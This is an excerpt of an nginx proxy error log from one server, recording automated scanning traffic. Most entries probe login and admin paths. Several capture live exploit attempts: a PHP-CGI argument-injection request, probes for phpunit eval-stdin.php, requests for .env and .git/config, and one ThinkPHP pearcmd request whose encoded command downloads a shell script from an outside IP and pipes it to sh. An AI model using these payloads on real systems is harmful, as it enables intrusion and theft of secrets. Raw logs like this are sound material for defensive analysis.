386#386: *279608 open() "/var/www/html/management/v1/cluster/state" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /management/v1/cluster/state HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 386#386: *279609 open() "/var/www/html/monitor/index.php/auth/login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /monitor/index.php/auth/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 386#386: *279611 open() "/var/www/html/api/v2.0/systeminfo" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v2.0/systeminfo HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:01 [error] 386#386: *279615 open() "/var/www/html/localstart.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:01 [error] 386#386: *279617 open() "/var/www/html/api/v1/cluster/summary" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v1/cluster/summary HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:01 [error] 388#388: *279619 open() "/var/www/html/browser/index.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /browser/index.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:01 [error] 388#388: *279620 open() "/var/www/html/nmc/rss/server" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /nmc/rss/server HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:01 [error] 388#388: *279624 open() "/var/www/html/ScadaBR/login.htm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /ScadaBR/login.htm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 387#387: *280839 open() "/var/www/html/webpages/login.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /webpages/login.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 389#389: *280825 open() "/var/www/html/base.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 387#387: *281118 open() "/var/www/html/rest/settings" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /rest/settings HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 386#386: *281123 open() "/var/www/html/indice.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 387#387: *281306 open() "/var/www/html/admin" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 389#389: *281301 "/var/www/html/download/python/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /download/python/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 389#389: *281672 open() "/var/www/html/sms_mp/.sms_aut" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /sms_mp/.sms_aut?mplist HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 389#389: *281680 open() "/var/www/html/api/system/status" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/system/status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 389#389: *281690 open() "/var/www/html/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:02 [error] 387#387: *282622 open() "/var/www/html/base.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:03 [error] 387#387: *282625 open() "/var/www/html/cgi-bin/getagent.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/getagent.cgi?type=s HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:03 [error] 387#387: *282637 open() "/var/www/html/default.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:04 [error] 387#387: *282645 open() "/var/www/html/base.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:05 [error] 387#387: *282667 open() "/var/www/html/base.inc" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.inc HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:05 [error] 387#387: *282671 open() "/var/www/html/menu.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:05 [error] 387#387: *282682 open() "/var/www/html/localstart.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:06 [error] 387#387: *282693 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:06 [error] 387#387: *282703 open() "/var/www/html/inicio.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:06 [error] 387#387: *282710 open() "/var/www/html/localstart.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:06 [error] 387#387: *282711 open() "/var/www/html/home.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:06 [error] 387#387: *282712 open() "/var/www/html/default.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:07 [error] 386#386: *282713 open() "/var/www/html/menu.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:07 [error] 386#386: *282714 open() "/var/www/html/admin.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:07 [error] 386#386: *282715 open() "/var/www/html/start.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:07 [error] 386#386: *282716 open() "/var/www/html/default.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:07 [error] 386#386: *282717 open() "/var/www/html/main.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:07 [error] 386#386: *282718 open() "/var/www/html/base.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:08 [error] 386#386: *282719 open() "/var/www/html/indice.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:08 [error] 386#386: *282720 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:08 [error] 386#386: *282721 open() "/var/www/html/indice.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:08 [error] 386#386: *282722 open() "/var/www/html/menu.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:08 [error] 386#386: *282723 open() "/var/www/html/main.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 386#386: *282724 open() "/var/www/html/start.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 386#386: *282725 open() "/var/www/html/main.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 386#386: *282726 open() "/var/www/html/indice.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 386#386: *282727 open() "/var/www/html/indice.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 386#386: *282728 open() "/var/www/html/indice.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 388#388: *282729 open() "/var/www/html/inicio.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:09 [error] 388#388: *282730 open() "/var/www/html/default.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:10 [error] 388#388: *282731 open() "/var/www/html/admin.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:10 [error] 388#388: *282732 open() "/var/www/html/index.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:10 [error] 388#388: *282733 open() "/var/www/html/indice.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:10 [error] 388#388: *282734 open() "/var/www/html/inicio.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:10 [error] 388#388: *282735 open() "/var/www/html/indice.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:10 [error] 388#388: *282736 open() "/var/www/html/inicio.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:11 [error] 388#388: *282737 open() "/var/www/html/start.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:11 [error] 388#388: *282738 open() "/var/www/html/inicio.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:11 [error] 388#388: *282740 open() "/var/www/html/default.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:11 [error] 388#388: *282741 open() "/var/www/html/main.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 388#388: *282742 open() "/var/www/html/base.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 388#388: *282743 open() "/var/www/html/main.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 388#388: *282744 open() "/var/www/html/admin.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 389#389: *282745 open() "/var/www/html/start.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 389#389: *282746 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 389#389: *282747 open() "/var/www/html/default.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:12 [error] 389#389: *282748 open() "/var/www/html/home.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:13 [error] 389#389: *282749 open() "/var/www/html/start.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:13 [error] 389#389: *282750 open() "/var/www/html/home.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:13 [error] 389#389: *282751 open() "/var/www/html/main.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:13 [error] 389#389: *282752 open() "/var/www/html/inicio.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:13 [error] 389#389: *282753 open() "/var/www/html/inicio.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:13 [error] 389#389: *282754 open() "/var/www/html/menu.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 389#389: *282755 open() "/var/www/html/default.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 389#389: *282756 open() "/var/www/html/default.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 389#389: *282757 open() "/var/www/html/inicio.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 389#389: *282758 open() "/var/www/html/start.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 389#389: *282759 open() "/var/www/html/localstart.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 389#389: *282760 open() "/var/www/html/localstart.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:14 [error] 387#387: *282761 open() "/var/www/html/menu.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282762 open() "/var/www/html/inicio.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282763 open() "/var/www/html/indice.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282764 open() "/var/www/html/localstart.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282765 open() "/var/www/html/default.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282766 open() "/var/www/html/start.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282767 open() "/var/www/html/localstart.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:15 [error] 387#387: *282768 open() "/var/www/html/main.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:16 [error] 387#387: *282769 open() "/var/www/html/start.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:16 [error] 387#387: *282770 open() "/var/www/html/index.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:16 [error] 387#387: *282771 open() "/var/www/html/localstart.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:16 [error] 387#387: *282772 open() "/var/www/html/start.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:16 [error] 387#387: *282773 open() "/var/www/html/home.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:16 [error] 387#387: *282774 open() "/var/www/html/menu.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 387#387: *282775 open() "/var/www/html/base.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 387#387: *282776 open() "/var/www/html/default.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 386#386: *282777 open() "/var/www/html/index.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 386#386: *282778 open() "/var/www/html/menu.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 386#386: *282779 open() "/var/www/html/default.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /default.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 386#386: *282780 open() "/var/www/html/menu.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:17 [error] 386#386: *282781 open() "/var/www/html/base.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:18 [error] 386#386: *282782 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:18 [error] 386#386: *282783 open() "/var/www/html/home.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:18 [error] 386#386: *282784 open() "/var/www/html/home.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:05:49 [error] 386#386: *282828 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/18 03:07:24 [error] 386#386: *282833 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 14.103.144.36, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:07:28 [error] 386#386: *282833 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 14.103.144.36, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:07:29 [error] 386#386: *282833 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 14.103.144.36, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:07:29 [error] 386#386: *282833 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 14.103.144.36, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:07:40 [error] 386#386: *282833 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 14.103.144.36, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:17:02 [error] 388#388: *282845 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 120.48.109.87, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:17:06 [error] 388#388: *282845 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 120.48.109.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:17:07 [error] 388#388: *282845 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 120.48.109.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:17:08 [error] 388#388: *282845 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 120.48.109.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:17:09 [error] 388#388: *282845 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 120.48.109.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:17:28 [error] 388#388: *282845 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 120.48.109.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 03:39:53 [error] 388#388: *282862 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 04:03:34 [error] 388#388: *282881 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/18 04:20:19 [error] 389#389: *282899 open() "/var/www/html/.env" failed (2: No such file or directory), client: 209.38.90.125, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 04:20:20 [error] 389#389: *282900 open() "/var/www/html/.git/config" failed (2: No such file or directory), 